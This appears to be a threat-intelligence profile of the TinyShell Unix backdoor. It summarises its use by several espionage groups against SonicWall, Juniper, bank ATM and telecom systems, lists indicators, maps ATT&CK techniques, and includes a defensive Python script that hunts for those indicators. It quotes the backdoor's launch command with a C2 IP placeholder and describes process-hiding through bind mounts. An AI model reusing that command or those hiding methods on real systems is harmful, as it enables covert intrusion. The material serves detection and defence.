TINYSHELL
TinyShell is a Unix/Linux backdoor used for persistence and command-and-control on network appliances and servers. Public reporting describes it as a publicly available backdoor that has been customized into multiple variants, including ELF binaries deployed with shell scripts on embedded and appliance platforms. Reported capabilities include establishing outbound C2 over dynamic DNS, reverse-shell access, an optional bind-shell (listening) mode, interactive shell access, file transfer, SOCKS proxying in some customized variants, and encrypted C2 in the UNC3886 RedPenguin-related variants. It has also been observed masquerading as legitimate processes, such as the LightDM display manager (lightdm), to evade detection.
TinyShell has been associated with several threat clusters and campaigns in public reporting.

UNC2891 deployed TinyShell during a 2024 intrusion into an Indonesian bank after physically implanting a Raspberry Pi with a 4G modem on the ATM network; the backdoor established persistent access via a dynamic DNS C2 channel and was hidden using Linux bind mounts, with malicious processes observed at /tmp/lightdm and /var/snap/.snapd/lightdm.

Mandiant and SonicWall reported a likely China-nexus campaign tracked as UNC4540 targeting unpatched SonicWall SMA appliances, where a TinyShell variant at /bin/httpsd was launched by bash scripts such as /bin/firewalld and /bin/iptabled to provide reverse-shell access, steal hashed credentials from the appliance's SQLite session database, and persist across firmware upgrades by modifying INITRD.GZ and inserting a backdoor user named acme.

Mandiant also reported that UNC3886, a China-nexus espionage group, deployed several TinyShell-based backdoors on end-of-life Juniper MX routers running Junos OS: six distinct variants with active and passive functionality, embedded scripts to disable logging, RC4-encrypted outbound C2 in RedPenguin-related tooling, a default bind port of 45678 in some variants, and use alongside process injection and memory patching of Junos daemons after exploitation of CVE-2025-21590.

Rapid7 further reported TinyShell as post-exploitation tooling used by the China-linked Red Menshen telecom espionage campaign for stealthy persistence and lateral movement alongside BPFDoor, CrossC2, Sliver, keyloggers, and brute-force tools.
Targets explicitly mentioned in the sources include SonicWall SMA appliances, Juniper Junos OS MX routers, banking infrastructure including ATM-connected Linux systems and Raspberry Pi implants, and telecommunications environments. High-confidence indicators and artifacts mentioned include dynamic DNS-based C2; the execution paths /bin/httpsd, /tmp/lightdm, and /var/snap/.snapd/lightdm; the SonicWall-related MD5 hashes 2d57bcb8351cf2b57c4fd2d1bb8f862e for /bin/httpsd, e4117b17e3d14fe64f45750be71dbaa6 for /bin/firewalld, and 8dbf1effa7bc94fc0b9b4ce83dfce2e6 for /bin/iptabled; the SonicWall launch syntax nohup /bin/httpsd -c <C2 IP> -d 5 -m -1 -p 51432; the default bind port 45678 in some Juniper-related UNC3886 variants; and YARA references for TINYSHELL.
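A host-hunting script for the indicators above, written here as an added example (it is not Mallory's code nor any vendor's): it flags the reported paths and MD5s, a lightdm process running outside its normal location, and bind mounts placed over /proc/<pid> entries. The process records and mount table are constructed samples, the legitimate LightDM locations are an assumption, and the bind-mount check assumes the hiding mount covers the process's /proc/<pid> directory.

```python
"""Hunt for TinyShell artifacts named on this page: known paths and MD5s, a
'lightdm' process outside its normal location, and bind mounts over /proc/<pid>."""
import re

# Indicators taken from the page (UNC4540 SonicWall hashes, UNC2891 paths).
KNOWN_PATHS = {"/bin/httpsd", "/tmp/lightdm", "/var/snap/.snapd/lightdm"}
KNOWN_MD5 = {
    "2d57bcb8351cf2b57c4fd2d1bb8f862e": "/bin/httpsd",
    "e4117b17e3d14fe64f45750be71dbaa6": "/bin/firewalld",
    "8dbf1effa7bc94fc0b9b4ce83dfce2e6": "/bin/iptabled",
}
# Assumed locations of a genuine LightDM binary; adjust per distribution.
LEGIT_LIGHTDM = {"/usr/sbin/lightdm", "/usr/bin/lightdm"}

def check_process(proc):
    """Findings for one process record: {pid, comm, exe (resolved path), md5 of exe}."""
    findings = []
    if proc["exe"] in KNOWN_PATHS:
        findings.append(f"pid {proc['pid']}: {proc['exe']} is a reported TinyShell path")
    if proc["md5"] in KNOWN_MD5:
        findings.append(f"pid {proc['pid']}: MD5 matches reported {KNOWN_MD5[proc['md5']]}")
    if proc["comm"] == "lightdm" and proc["exe"] not in LEGIT_LIGHTDM:
        findings.append(f"pid {proc['pid']}: 'lightdm' running from {proc['exe']} (masquerade)")
    return findings

def find_proc_bind_mounts(mounts_text):
    """PIDs whose /proc/<pid> directory is covered by a mount (PID-hiding pattern).
    Input is /proc/mounts-style text: '<src> <mountpoint> <fstype> <opts> 0 0'."""
    hidden = []
    for line in mounts_text.splitlines():
        fields = line.split()
        m = re.fullmatch(r"/proc/(\d+)", fields[1]) if len(fields) > 1 else None
        if m:
            hidden.append(int(m.group(1)))
    return hidden

# Constructed sample telemetry (not from any real host) for a stand-alone run.
SAMPLE_PROCS = [
    {"pid": 812, "comm": "lightdm", "exe": "/usr/sbin/lightdm", "md5": "0" * 32},
    {"pid": 4021, "comm": "lightdm", "exe": "/tmp/lightdm", "md5": "f" * 32},
    {"pid": 4103, "comm": "httpsd", "exe": "/opt/app/httpsd",
     "md5": "2d57bcb8351cf2b57c4fd2d1bb8f862e"},
]
SAMPLE_MOUNTS = "proc /proc proc rw 0 0\n/tmp/.x /proc/4021 none rw,bind 0 0\n"
if __name__ == "__main__":
    for p in SAMPLE_PROCS:
        for f in check_process(p):
            print(f)
    print("bind-mounted /proc entries:", find_proc_bind_mounts(SAMPLE_MOUNTS))
```

On a live host, build the process records from /proc/<pid>/comm, the readlink of /proc/<pid>/exe and an MD5 of that file, and feed /proc/mounts to find_proc_bind_mounts; a PID that appears in the mount table but not in a process listing is the case worth escalating.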
Vulnerabilities exploited
1 CVE correlated with this family across public research and vendor advisories.
Mandiant uncovered several TINYSHELL-based backdoors operating on Juniper Networks’ Junos OS routers.
Groups observed using it
6 distinct threat actors attributed by public researchers.
Using the TINYSHELL backdoor, the attacker established an outbound command-and-control (C2) channel via a Dynamic DNS domain.
Mandiant explained in a blog post that last year it discovered the UNC3886 “China-nexus espionage group” had deployed several TINYSHELL-based backdoors into Junos OS-powered routers.
The malware used on SonicWall devices consists of an ELF binary, the TinyShell backdoor, and several bash scripts that show a deep understanding of the targeted network devices.
Once inside, attackers deploy tools such as CrossC2 for command execution, TinyShell for stealthy persistence, and keyloggers or brute-force tools to steal credentials and move laterally toward core systems.
Also dropped are Sliver, TinyShell (a Unix backdoor), keyloggers, and brute-force utilities to facilitate credential harvesting and lateral movement.
Techniques & procedures
21 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development
1 technique
UNC3886 has deployed custom malware families on Fortinet and VMware systems. During RedPenguin, UNC3886 deployed custom malware based on the publicly-available TINYSHELL backdoor.
Initial Access
3 techniques
Attacks usually begin at the network edge by exploiting exposed services or valid accounts on devices like VPNs, firewalls, and virtualization hosts.
A suspected Chinese hacking campaign has been targeting unpatched SonicWall Secure Mobile Access (SMA) appliances... While it is unclear what vulnerability was used to compromise devices, Mandiant says that the targeted devices were unpatched, making them likely vulnerable to older flaws.
Initial access was gained by physically implanting a Raspberry Pi device with a 4G modem into an ATM.
Execution
2 techniques
One of the most recognized tools in its malware arsenal is a Linux backdoor called BPFDoor.
Upon gaining a successful foothold, Linux-compatible beacon frameworks such as CrossC2 are deployed to facilitate post-exploitation activities.
The malware used on SonicWall devices consists of an ELF binary, the TinyShell backdoor, and several bash scripts... The threat actors achieved this by using scripts that offer redundancy and ensure long-term access to breached devices.
Persistence
4 techniques
Attacks usually begin at the network edge by exploiting exposed services or valid accounts on devices like VPNs, firewalls, and virtualization hosts.
"In March 2025, it was revealed that Chinese cyber-espionage actors were deploying custom backdoors on EoL Junos OS MX routers to drop a set of ‘TinyShell’ backdoor variants."
Mandiant explained ... it discovered the UNC3886 “China-nexus espionage group” had deployed several TINYSHELL-based backdoors into Junos OS-powered routers.
Privilege Escalation
4 techniques
The blog details their techniques, including a novel process injection method to circumvent built-in protections...
Attacks usually begin at the network edge by exploiting exposed services or valid accounts on devices like VPNs, firewalls, and virtualization hosts.
Mandiant explained ... it discovered the UNC3886 “China-nexus espionage group” had deployed several TINYSHELL-based backdoors into Junos OS-powered routers.
Stealth
6 techniques
"UNC2891 deployed a range of custom malware, including CAKETAP (a Solaris/Linux rootkit)... attackers maintained undetected access for years"
The backdoor process, which was named “lightdm” in an attempt to masquerade as the legitimate LightDM display manager, was found at an unusual location.
The blog details their techniques, including a novel process injection method to circumvent built-in protections...
These backdoors included active and passive functions, and embedded scripts that disabled logging mechanisms on the device.
Attacks usually begin at the network edge by exploiting exposed services or valid accounts on devices like VPNs, firewalls, and virtualization hosts.
UNC2891 had managed to hide the PIDs of its backdoor processes with a previously undocumented technique that uses Linux bind mounts to hide process artifacts.
Credential Access
3 techniques
Also dropped are Sliver, TinyShell, keyloggers, and brute-force utilities to facilitate credential harvesting and lateral movement.
Collection
1 technique
Command and Control
4 techniques
Using the TINYSHELL backdoor, the attacker established an outbound command-and-control (C2) channel via a Dynamic DNS domain.
MITRE list: "T1105: Ingress Tool Transfer", with a description of deploying multiple utilities and toolkit components.
Additionally, firewalld launches other malware components, like TinyShell, to establish a reverse shell on the appliance for easy remote access.
UNC2891 then used a TINYSHELL backdoor to create a command-and-control (C2) channel via a dynamic DNS domain.
Recent activity
24 sources tracked across advisories, community write-ups, and news.
A custom backdoor family used by UNC3886 on Junos OS routers, including active and passive backdoor functions and embedded scripts that disabled logging mechanisms on the device to support stealth and persistence.
A backdoor used to establish outbound C2 access from the compromised ATM network via Dynamic DNS, enabling persistent remote access and bypassing perimeter defenses.
A stealthy persistence tool/backdoor used after initial access to maintain covert footholds in compromised environments.
A Unix backdoor used in the campaign to support credential harvesting and lateral movement after compromise.